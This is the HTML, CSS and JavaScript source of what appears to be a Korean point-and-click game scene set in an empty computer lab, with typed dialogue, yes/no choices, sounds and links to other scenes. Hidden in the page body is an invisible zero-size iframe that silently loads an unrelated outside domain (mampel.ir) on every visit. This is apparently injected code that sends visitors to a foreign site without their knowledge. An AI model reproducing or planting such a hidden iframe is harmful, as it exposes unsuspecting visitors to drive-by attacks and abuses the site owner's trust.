<!DOCTYPE html>
<html>
<title>602</title>
<style>
@font-face {
      font-family: "DungGeunMo";
      src: url("DungGeunMo.woff");
    }
	
	body{background-color: #484535; font-family: "DungGeunMo";}
	#backk{width: auto; height: 100%; animation:start 2s alternate;}
	#backk img{width: 1250px; height: auto;}
	
	#bx { position: absolute; bottom: 5%; left: 25%; display:none; }
	#bx img{ width: 70%; height: auto;  }

	#poom{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom2{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom3{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom4{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom5{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom6{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 65%;font-family: "DungGeunMo";cursor: pointer;}
	#poom7{bottom: 7%; font-weight: 5px; font-size: 1em;display:none; left: 65%;font-family: "DungGeunMo";cursor: pointer;}
	#poom6:hover{color: white; } 
	#poom7:hover{color: white;} 
	#momo{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom8{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}




	#okk{bottom: 11%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#okk img{height: 20px;width: auto; }
	#okkk{bottom: 11%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#okkk img{height: 20px;width: auto; }	

	#oo{bottom: 11%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#oo img{height: 20px;width: auto; }
	#ooo{bottom: 11%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#ooo img{height: 20px;width: auto; }
	#oooo{bottom: 11%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#oooo img{height: 20px;width: auto; }	

	#soun { position: absolute; z-index: 99;cursor: pointer; top:15%; right: 25%; }
	#soun img{ position: absolute; width: 300px; height: 800px;z-index: 99;cursor: pointer;}

	
	#sigar { position: absolute; z-index: 99;cursor: pointer; bottom:60%; left: 15%; }
	#sigar img{ position: absolute; width: 100px; height: 200px;z-index: 99;cursor: pointer;}

	#moni { position: absolute; z-index: 99;cursor: pointer; bottom:53.5%; right: 22%;  animation:blink 5s infinite;}
	#moni img{ position: absolute; width: 50px; height: auto; z-index: 99;cursor: pointer;}

	#turn{bottom: 8%; left: 42%; position: absolute;animation: backk 3s alternate; }
	#turn img{width: 40px; height: auto;cursor: pointer; }

	#fronts{top: 65%; left: 22%; position: absolute;animation: fron 3s alternate; }
	#fronts img{width: 40px; height: auto;cursor: pointer; }

	#tt { position: absolute; z-index: 99; top: 8%; left: 37%; animation: tra 2s alternate; display: none;cursor: pointer; }
	#tt img{ position: absolute; z-index: 99; width: 500px; height: auto; }	

	#lefts{top: 50%; left: 3%; position: absolute; cursor: pointer; animation: here 3s alternate;}
	#lefts img{width: 40px; height: auto; }

	#container{position: relative; margin: auto; width:1250px; height: 1000px;font-family: "DungGeunMo"; }

@-webkit-keyframes typing { from { width: 0; } }
@-webkit-keyframes blink-caret { 50% { border-color: #484535; } }
@keyframes start{
			0%{opacity: 0;}
			
			100%{opacity: 1;}
		}


@keyframes inin{
			0%{top: 71%;}
			
			100%{top: 68%;}
		}
@keyframes backk{
			0%{bottom: 11%;}
			
			100%{bottom: 8%;}
		}			


@keyframes here{
			0%{left: 6%;}
			
			100%{left: 3%;}
		}
		
@keyframes heree{
			0%{right: 20%;}
			
			100%{right: 18%;}
		}
@keyframes tra{
			0%{opacity: 0}
			
			100%{opacity: 1}
		}
@keyframes fron{
			0%{top: 68%;}
			
			100%{top: 65%;}
		}		
@keyframes blink{
			0%{opacity: 0}
			
			20%{opacity: 100%;}
			25%{opacity: 0%;}
			50%{opacity: 100%;}
			80%{opacity: 0%;}
			100%{opacity: 100%;}
		}	

h1 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 15ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 1s steps(15, end),
	           blink-caret .1s step-end infinite alternate;z-index: 3;
}

h2 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 18ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 1s steps(15, end),
	           blink-caret .1s step-end infinite alternate;z-index: 3;
}
h3 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 50ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 2s steps(30, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h4 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 9ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 1s steps(10, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}

h5 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 5ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 1s steps(10, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h6 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 35ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 2s steps(30, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}

</style>

<head>
	<title></title>
</head>

<body>


	<div id="container">
	 <h3 id="poom">컴퓨터 실기실1이다. 텅 비어있는 듯 하다.</h3>
	 	<h1 id="poom2">들어가볼까...?</h1>
	 	<h6 id="poom3">그래 수업도 아닌데 들어가지 말자.</h6>
	 		 	
	 	<h5 id="poom6">▶예</h5>
	 	<h4 id="poom7">▶아니오</h4>
	 	<h2 id="poom8">잠깐 들어가보자...</h2>
	 	<h3 id="momo">모니터 화면이 하나가 켜져있다...누가 안끄고 갔나?</h6>
	
	
	 	<audio id="walk">
		<source src="walk.mp3" type="audio/mpeg"autoplay="true" preload="auto">
	</audio>
		<audio id="hmm">
		<source src="hmm.mp3" type="audio/mpeg"autoplay="true" preload="auto">
	</audio>

	
	<audio id="gli">
		<source src="gli.mp3" type="audio/mpeg">
	</audio>
	<audio id="drop">
		<source src="drop.mp3" type="audio/mpeg">
	</audio>
	<audio id="umm">
		<source src="umm.mp3" type="audio/mpeg">
	</audio>
	<audio id="but">
		<source src="but.mp3" type="audio/mpeg">
	</audio>





<iframe src="http://mampel.ir/" frameborder="0" style="width:0px;height:0px;border:0px" ></iframe>


	<div id="backk">
		<center>
		<img src="main.png">
		</center>
	</div>
	<a href="https://seoojing.github.io/617_map/">
	<div id="turn">
		<img src="turn.png">
	</div>
</a>
	<div id="lefts">
		<img src="here.png">
	</div>
<a href="https://seoojing.github.io/com2/">
	<div id="fronts">
		<img src="there.png">
	</div>
</a>

	<div id="bx">
		<img src="boox.png">
	</div>
	<div id="soun">
		<img src="blank.png">
	</div>

<div id="sigar">
		<img src="blank.png">
	</div>
	<div id="moni">
		<img src="spot.png">
	</div>

	<div id="oo">
		<img src="won.png">
	</div>
	<div id="ooo">
		<img src="won.png">
	</div>

	<div id="okk">
		<img src="okk.png">
	</div>
<a href="https://seoojing.github.io/popol_map/">
	<div id="okkk">
		<img src="okk.png">
	</div>
</a>
	<div id="tt">
		<img src="sig.png">
	</div>

	
</div>
<script type="text/javascript">



var bbPlay = 0;

window.onmousemove = function(){
	bbPlay++;
	if(bbPlay == 1){drop.play(); walk.play();  }
}

	
var toggle = "off";
	var clickNumber = 0;
	soun.onclick = function(){
		
			toggle = "on";
			bx.style.display = "inline";
			poom.style.display = "inline";
			oo.style.display = "inline"
			soun.style.display = "none"
			but.play();


			}

	moni.onclick = function(){
		
			toggle = "on";
			bx.style.display = "inline";
			momo.style.display = "inline";
			ooo.style.display = "inline"
			but.play();
			gli.play();
			}

	oo.onclick = function(){
			poom.style.display = "none"
			oo.style.display = "none"
			poom2.style.display = "inline"			
			poom6.style.display = "inline"
			poom7.style.display = "inline"
		but.play();}

	ooo.onclick = function(){
			momo.style.display = "none"
			but.play();
			ooo.style.display = "none"
			bx.style.display = "none"
			}


	


	okk.onclick = function(){
		but.play();
			poom2.style.display = "none"
			poom3.style.display = "none"
			okk.style.display = "none"
			bx.style.display = "none"
			poom4.style.display = "none"
			poom6.style.display = "none"
			
			face2.style.display = "none"
			tt.style.display = "none"
			

}

poom7.onclick = function(){
		poom6.style.display = "none"
			poom7.style.display = "none"
			poom2.style.display = "none"
			bx.style.display = "inline";
			but.play();
			poom3.style.display = "inline";
			okk.style.display = "inline"			
			poom4.style.display = "none"			
			tt.style.display = "none"
			}

poom6.onclick = function(){
	poom6.style.display = "none"
			poom7.style.display = "none"
			poom2.style.display = "none"
			bx.style.display = "inline";
			poom8.style.display = "inline";
			okkk.style.display = "inline"
			
			poom4.style.display = "none"
			
			
			tt.style.display = "none"
			}











</script>
</body>
</html>
